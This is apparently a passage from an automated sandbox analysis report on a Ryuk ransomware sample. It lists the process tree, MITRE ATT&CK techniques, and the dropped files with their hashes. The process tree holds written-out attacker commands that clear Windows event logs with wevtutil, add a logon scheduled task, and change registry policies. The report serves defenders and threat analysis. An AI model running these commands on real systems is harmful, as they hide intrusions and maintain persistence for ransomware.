- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "System"
    3⤵
    PID:428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "TabletPC_InputPanel_Channel"
    3⤵
    PID:236
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"
    3⤵
    PID:892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"
    3⤵
    PID:1416
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"
    3⤵
    PID:1980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WMPSetup"
    3⤵
    - Clears Windows event logs
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WMPSyncEngine"
    3⤵
    - Clears Windows event logs
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Windows PowerShell"
    3⤵
    PID:212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "muxencode"
    3⤵
    PID:272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
  2⤵
  PID:1884
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:1736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
  2⤵
  PID:1124
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
    3⤵
    PID:1100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
  2⤵
  PID:1448
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
    3⤵
    PID:1436

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1444

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Indicator Removal on Host

T1070

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.html

Filesize
152B

MD5
a641bf8ac8307aad57ecab53872e67db

SHA1
6fa8d69a859c34b8e75223ed8f426dbdf3d03df7

SHA256
9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce

SHA512
7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txt

Filesize
1KB

MD5
f69127370e1f1aede86e881dd446f6aa

SHA1
65298f80e3b97f59ea45179463ab9c5cc3ee9337

SHA256
da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

SHA512
5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit
C:\ProgramData\RYUKID

Filesize
8B

MD5
d795239d3f1352b71cf422ab8d1173ef

SHA1
a638a77d7113b1809ed104e966c2182804e9f6b2

SHA256
926453fb93bebe6fceb108adb3bcfa86fa3acb34a72e5d4b9df882cd30718298

SHA512
ed7d6b3576ecc3641835674c5fc55eb130011983663920b2dc00bb1c58db18eb1a19bea838d89a3c424ba69d6c9069c78d7f8ac53f55e326752959e92eae25e9

Download Submit
C:\ProgramData\RyukReadMe.html.[[email protected]].RYK

Filesize
858B

MD5
3b1ed270feb9965830536509474cc811

SHA1
3d247ef3bca5dff8731a383bf09d8f02e57b1bca

SHA256
8908e9fa9e26bc051fca82a66dadff60c85b513786dcd8d84e5ca8b42eee5d19

SHA512
aeca2bd2faf1ce40853e12c20f98a08dbb873f763322347ded7ce62c30fb8d47b96481a27e1d5de22f4a6b7d23d47bfc6b3d853f87dca9959bcfd1d60215a713

Download Submit
C:\ProgramData\RyukReadMe.txt

Filesize
1KB

MD5
f69127370e1f1aede86e881dd446f6aa

SHA1
65298f80e3b97f59ea45179463ab9c5cc3ee9337

SHA256
da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc

SHA512
5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
dc7bf0d9a1ff7125f82056b89d6ec12a

SHA1
257be6d31211bbbc4ac39d874d37f342c42a7a11

SHA256
8c22f22ebc7e06d6fd8ec80be245db69daa02ec2d6527b38f2a93297a052b4a6

SHA512
d9136e3f7157feeb9a78d434594a7475a8d5776735f1bfe782d4f9b6ea51de80a5720001d9896a6249f796764000349f333e4063a0370d1a7de23bc5d8638cce

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
dc7bf0d9a1ff7125f82056b89d6ec12a

SHA1
257be6d31211bbbc4ac39d874d37f342c42a7a11

SHA256
8c22f22ebc7e06d6fd8ec80be245db69daa02ec2d6527b38f2a93297a052b4a6

SHA512
d9136e3f7157feeb9a78d434594a7475a8d5776735f1bfe782d4f9b6ea51de80a5720001d9896a6249f796764000349f333e4063a0370d1a7de23bc5d8638cce

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
dc7bf0d9a1ff7125f82056b89d6ec12a

SHA1
257be6d31211bbbc4ac39d874d37f342c42a7a11

SHA256
8c22f22ebc7e06d6fd8ec80be245db69daa02ec2d6527b38f2a93297a052b4a6

SHA512
d9136e3f7157feeb9a78d434594a7475a8d5776735f1bfe782d4f9b6ea51de80a5720001d9896a6249f796764000349f333e4063a0370d1a7de23bc5d8638cce

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
0a44b74e4002fb17645d86e920e84d16

SHA1
569d736c5eceb15a6363218db5d8b0f07a4f26de

SHA256
e8e744d6d9a3aa3e5783b1d1e7c5d6c34f780be7fd9adf2c9f26ec7753386287

SHA512
3ea2b3c2c87563db65fb13d7a5cf8f815f12c57d1a74c8dae70db1b6f1c5c7374ed748d8a4a1003d9bcef02db8c647ff553e4d6de03f1736a72d8ff3dc6f6cde

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
0a44b74e4002fb17645d86e920e84d16

SHA1
569d736c5eceb15a6363218db5d8b0f07a4f26de

SHA256
e8e744d6d9a3aa3e5783b1d1e7c5d6c34f780be7fd9adf2c9f26ec7753386287

SHA512
3ea2b3c2c87563db65fb13d7a5cf8f815f12c57d1a74c8dae70db1b6f1c5c7374ed748d8a4a1003d9bcef02db8c647ff553e4d6de03f1736a72d8ff3dc6f6cde

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
0a44b74e4002fb17645d86e920e84d16

SHA1
569d736c5eceb15a6363218db5d8b0f07a4f26de

SHA256
e8e744d6d9a3aa3e5783b1d1e7c5d6c34f780be7fd9adf2c9f26ec7753386287

SHA512
3ea2b3c2c87563db65fb13d7a5cf8f815f12c57d1a74c8dae70db1b6f1c5c7374ed748d8a4a1003d9bcef02db8c647ff553e4d6de03f1736a72d8ff3dc6f6cde

Download Submit
C:\ProgramData\ryuk.exe

Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID

Filesize
8B

MD5
d795239d3f1352b71cf422ab8d1173ef

SHA1
a638a77d7113b1809ed104e966c2182804e9f6b2

SHA256
926453fb93bebe6fceb108adb3bcfa86fa3acb34a72e5d4b9df882cd30718298

SHA512
ed7d6b3576ecc3641835674c5fc55eb130011983663920b2dc00bb1c58db18eb1a19bea838d89a3c424ba69d6c9069c78d7f8ac53f55e326752959e92eae25e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1

Filesize
2KB

MD5
dc7bf0d9a1ff7125f82056b89d6ec12a

SHA1
257be6d31211bbbc4ac39d874d37f342c42a7a11

SHA256
8c22f22ebc7e06d6fd8ec80be245db69daa02ec2d6527b38f2a93297a052b4a6

SHA512
d9136e3f7157feeb9a78d434594a7475a8d5776735f1bfe782d4f9b6ea51de80a5720001d9896a6249f796764000349f333e4063a0370d1a7de23bc5d8638cce

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2

Filesize
292B

MD5
0a44b74e4002fb17645d86e920e84d16

SHA1
569d736c5eceb15a6363218db5d8b0f07a4f26de

SHA256
e8e744d6d9a3aa3e5783b1d1e7c5d6c34f780be7fd9adf2c9f26ec7753386287

SHA512
3ea2b3c2c87563db65fb13d7a5cf8f815f12c57d1a74c8dae70db1b6f1c5c7374ed748d8a4a1003d9bcef02db8c647ff553e4d6de03f1736a72d8ff3dc6f6cde

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit